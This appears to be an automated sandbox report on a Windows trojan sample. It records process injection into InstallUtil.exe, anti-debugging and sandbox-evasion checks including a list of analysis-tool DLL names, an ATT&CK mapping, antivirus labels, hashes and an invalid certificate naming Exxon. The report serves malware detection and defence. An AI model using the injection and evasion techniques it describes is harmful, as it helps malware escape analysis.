Source: OojqjHGE0W.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: String function: 00B38510 appears 105 times
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: String function: 00B381D0 appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_004015C0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,10_2_004015C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_0040188D GetProcAddress,NtCreateSection,memset,10_2_0040188D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_004013B7 NtMapViewOfSection,10_2_004013B7
Source: OojqjHGE0W.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: OojqjHGE0W.exe | Static PE information: invalid certificate
Source: OojqjHGE0W.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: OojqjHGE0W.exe | ReversingLabs: Detection: 46%
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\OojqjHGE0W.exe "C:\Users\user\Desktop\OojqjHGE0W.exe"
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: classification engine | Classification label: mal100.troj.evad.winEXE@3/0@2/1
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B28340 StartServiceA,StrokePath,SetCurrentDirectoryA,CreateActCtxW,CloseHandle,GetTapeStatus,SetCurrentDirectoryA,0_2_00B28340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: OojqjHGE0W.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: OojqjHGE0W.exe | Static file information: File size 1241656 > 1048576
Source: OojqjHGE0W.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x111a00
Source: OojqjHGE0W.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: OojqjHGE0W.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: OojqjHGE0W.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: OojqjHGE0W.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: OojqjHGE0W.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: OojqjHGE0W.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: OojqjHGE0W.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdb | source: OojqjHGE0W.exe
Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP; | source: OojqjHGE0W.exe, 00000000.00000000.267737292.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, OojqjHGE0W.exe, 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP;Q | source: OojqjHGE0W.exe
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B28AC2 push ebp; iretd 0_2_00B28AD6
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B28A6D push es; iretd 0_2_00B28A86
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B28B2A push ebp; iretd 0_2_00B28AD6
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B3A3D0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B3A3D0
Source: initial sample | Static PE information: section name: .text entropy: 7.57139474025

                  Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

Source: OojqjHGE0W.exe, 00000000.00000002.477711873.00000000006FA000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ODBGHELP.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLCMDVRT64.DLLCMDVRT32.DLLSBIEDLL.DLLBGAGENT.DLLH
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep (graph_10-477)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5664 | Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_0-8131)
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | API coverage: 7.5 %
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | API call chain: ExitProcess graph end node (graph_0-8132)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | API call chain: ExitProcess graph end node (graph_10-470)

                  Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep (graph_10-477)
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B3A1A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B3A1A0
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B3A3D0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00B3A3D0
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B322D0 SetUnhandledExceptionFilter,0_2_00B322D0
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B38260 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B38260

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F21008
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page read and write
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\OojqjHGE0W.exe | Code function: 0_2_00B322F0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00B322F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 10_2_00401400 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,10_2_00401400

                  Stealing of Sensitive Information


                  Remote Access Functionality

MITRE ATT&CK techniques by tactic (the number preceding a technique is the count shown in the matrix for it):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: 2 Windows Management Instrumentation, 2 Service Execution, 12 Native API, At (Windows), Cron, Launchd
Persistence: 1 Windows Service, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: 1 Windows Service, 311 Process Injection, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: 12 Virtualization/Sandbox Evasion, 311 Process Injection, 1 Deobfuscate/Decode Files or Information, 3 Obfuscated Files or Information, 3 Software Packing, Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: 1 System Time Discovery, 22 Security Software Discovery, 12 Virtualization/Sandbox Evasion, 1 Process Discovery, 1 Remote System Discovery, 14 System Information Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: 1 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Protocol Impersonation, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Impact: Modify System Partition, Device Lockout, Delete Device Data
Source | Detection | Scanner | Label
OojqjHGE0W.exe | 46% | ReversingLabs | Win32.Trojan.Jaik
OojqjHGE0W.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
10.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.2.OojqjHGE0W.exe.8b5230.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
10.0.InstallUtil.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
10.2.InstallUtil.exe.1340000.1.unpack | 100% | Avira | HEUR/AGEN.1245293
10.0.InstallUtil.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.3.OojqjHGE0W.exe.2580000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.3.OojqjHGE0W.exe.8b5230.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.3.OojqjHGE0W.exe.2580000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7

No Antivirus matches

Source | Detection | Scanner | Label
https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot; | 0% | URL Reputation | safe
https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58ba&amp;bhid=6203eb0e7db0ad17f44b22d8&a | 0% | Avira URL Cloud | safe
https://cdn.hoergeraete.hoeren-heute.ch/horizon_reveal/?act=ACT0000040013ACT&amp;utm_source=mcrs&amp | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58b8&amp;bhid=62470ee6adad76040858398f&a | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
a-0003.fbs2-a-msedge.net | 13.107.40.203 | true | false | | unknown
anm.msn.com | unknown | unknown | false | | high
www.msn.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://www.msn.com/de-ch/ | false | | high
http://www.msn.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot; | InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/de-ch/news/other/weniger-verbindungen-zwischen-z%c3%bcrich-und-bern-daf%c3%bcr-m | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.msn.com/de-ch/news/other/fremdes-b%c3%bcsi-gef%c3%bcttert-frau-soll-1250-franken-strafe- | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://outlook.com/ | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.msn.com/de-ch/shopping | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ogp.me/ns# | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58ba&amp;bhid=6203eb0e7db0ad17f44b22d8&a | InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&amp;anoncknm=%22%22&amp;name=%22M | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.hoergeraete.hoeren-heute.ch/horizon_reveal/?act=ACT0000040013ACT&amp;utm_source=mcrs&amp | InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/de-ch/sport/other/der-fcz-verabschiedet-sich-von-doumbia-und-ceesay/ar-AAXsezM?o | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.msn.com/de-ch/news/other/stadtrat-handelt-in-z%c3%bcrich-west-mehr-preisg%c3%bcnstige-wo | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://deff.nelreports.net/api/report?cat=msn | InstallUtil.exe, 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/de-ch/news/other/autofahrer-38-rast-mit-94-km-h-durch-30er-zone/ar-AAXsnwd?ocid= | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ogp.me/ns/fb# | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.msn.com/de-ch/news/other/olivia-und-noah-sind-die-beliebtesten-baby-vornamen-in-z%c3%bcr | InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmp | false
                                                  high
                                                  https://www.msn.com/de-ch/news/other/z%c3%bcrcher-kantonsrat-pr%c3%bcft-nach-igelkot-vorfall-sicherhInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.msn.com/de-chInstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58b8&amp;bhid=62470ee6adad76040858398f&aInstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.40.203 | a-0003.fbs2-a-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:630152
Start date and time:19/05/2022 14:38:37 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 6m 49s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:OojqjHGE0W.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@3/0@2/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 96.7% (good quality ratio 96.7%)
                                                      • Quality average: 91.3%
                                                      • Quality standard deviation: 14%
                                                      HCA Information:
                                                      • Successful, ratio: 69%
                                                      • Number of executed functions: 20
                                                      • Number of non-executed functions: 7
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.169.118.173
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, redirection.prod.cms.msn.com.akadns.net, ctldl.windowsupdate.com, legacy-redirection-neurope-prod-hp.cloudapp.net
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: OojqjHGE0W.exe
                                                      No simulations
Match | Associated Sample Name / URL | Detection | Context
13.107.40.203 | 609E5ECDDA8C08C02C123B8376566361568646EEA8B50.exe | malicious |
13.107.40.203 | v9ZD101UF6.exe | malicious |
Match | Associated Sample Name / URL | Detection | Context
a-0003.fbs2-a-msedge.net | 609E5ECDDA8C08C02C123B8376566361568646EEA8B50.exe | malicious | 13.107.40.203
Match | Associated Sample Name / URL | Detection | Context
MICROSOFT-CORP-MSN-AS-BLOCKUS | eE6cagogwq | malicious | 104.215.126.128
MICROSOFT-CORP-MSN-AS-BLOCKUS | Olf76DB7wp | malicious | 20.31.98.77
MICROSOFT-CORP-MSN-AS-BLOCKUS | EY_Document_Order4590.exe | malicious | 51.142.243.136
MICROSOFT-CORP-MSN-AS-BLOCKUS | Remittance Advice.xlsm | malicious | 52.109.28.107
MICROSOFT-CORP-MSN-AS-BLOCKUS | pandora.arm | malicious | 65.55.103.18
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://giz-paraguay.wixsite.com/owa-domain-update | malicious | 13.107.43.14
MICROSOFT-CORP-MSN-AS-BLOCKUS | doc_1093983787847_484778333.pdf.vbs | malicious | 13.107.43.12
MICROSOFT-CORP-MSN-AS-BLOCKUS | INV-PL-CMR.vbs | malicious | 13.107.43.13
MICROSOFT-CORP-MSN-AS-BLOCKUS | SecuriteInfo.com.W32.AIDetect.malware2.18832.exe | malicious | 20.106.79.78
MICROSOFT-CORP-MSN-AS-BLOCKUS | bank_payment-doc.exe | malicious | 51.141.106.0
MICROSOFT-CORP-MSN-AS-BLOCKUS | IMG_1900037679995756674.exe | malicious | 13.107.43.12
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://1drv.ms/b/s!Ahxi4mLGHMVYgQGHnHcUVMM4VPCL | malicious | 13.107.43.12
MICROSOFT-CORP-MSN-AS-BLOCKUS | HLNGQDZK.EXE | malicious | 20.106.79.78
MICROSOFT-CORP-MSN-AS-BLOCKUS | rubix.arm7 | malicious | 52.113.110.229
MICROSOFT-CORP-MSN-AS-BLOCKUS | 9jquF7No4Y | malicious | 20.115.194.36
MICROSOFT-CORP-MSN-AS-BLOCKUS | kPWxmSPU8b | malicious | 163.228.110.173
MICROSOFT-CORP-MSN-AS-BLOCKUS | ZJ1s1xZgpL | malicious | 138.239.244.156
MICROSOFT-CORP-MSN-AS-BLOCKUS | https://t-b3g.club/?e=emmari@datacom.co.nz | malicious | 20.26.217.32
MICROSOFT-CORP-MSN-AS-BLOCKUS | phantom.arm7 | malicious | 13.65.160.252
MICROSOFT-CORP-MSN-AS-BLOCKUS | phantom.arm | malicious | 20.11.48.38
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.52461417001665
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:OojqjHGE0W.exe
                                                          File size:1241656
                                                          MD5:4ed3fa33609a51baf209a5954bef6633
                                                          SHA1:aff82f0554f18c780561d6b8b1ca5a1001e42512
                                                          SHA256:988177454fe3a5ba8fcdf7f3124e2c56f312b776542d3763540c254df6fe6f76
                                                          SHA512:3beaba94d2a6df632b029d0c48521cea8adb98a1b7eeee9d547544415b36a251c41fabce2bcbbdaf53f4e090783f49d7c10e5d952d9313aa182aa1c2971201f4
                                                          SSDEEP:24576:21uu0F2xRqVHdQ9PerE5gOGFGtCZXUzvjJMFHk1Udgd:A02WdQ9GCOFb6eXO
                                                          TLSH:AC4501017D8CC031ECA226B43836E295A13B7D81672664CB65F9B3AF95B1BC0DD79363
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t.....U.].....`.d.....T.....}.m.s...t...,.....Q.v.....d.u...t.i.r.....c.u...Richt...................PE..L......b...
                                                          Icon Hash:54f9e0c4dcf8705d
                                                          Entrypoint:0x411fc0
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x6283FED8 [Tue May 17 20:00:24 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:06a834e3824803366fcfecb5c9777295
                                                          Signature Valid:false
                                                          Signature Issuer:CN=GeoTrust RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
                                                          Signature Validation Error:A certificate chain could not be built to a trusted root authority
                                                          Error Number:-2146762486
Not Before, Not After:12/29/2021 4:00:00 PM, 9/2/2022 4:59:59 PM
Subject Chain:CN=exxon.com, O=Exxon Mobil Corporation, L=Irving, S=Texas, C=US
                                                          Version:3
                                                          Thumbprint MD5:B7C2B39C14AF65D1434078B10A8064DE
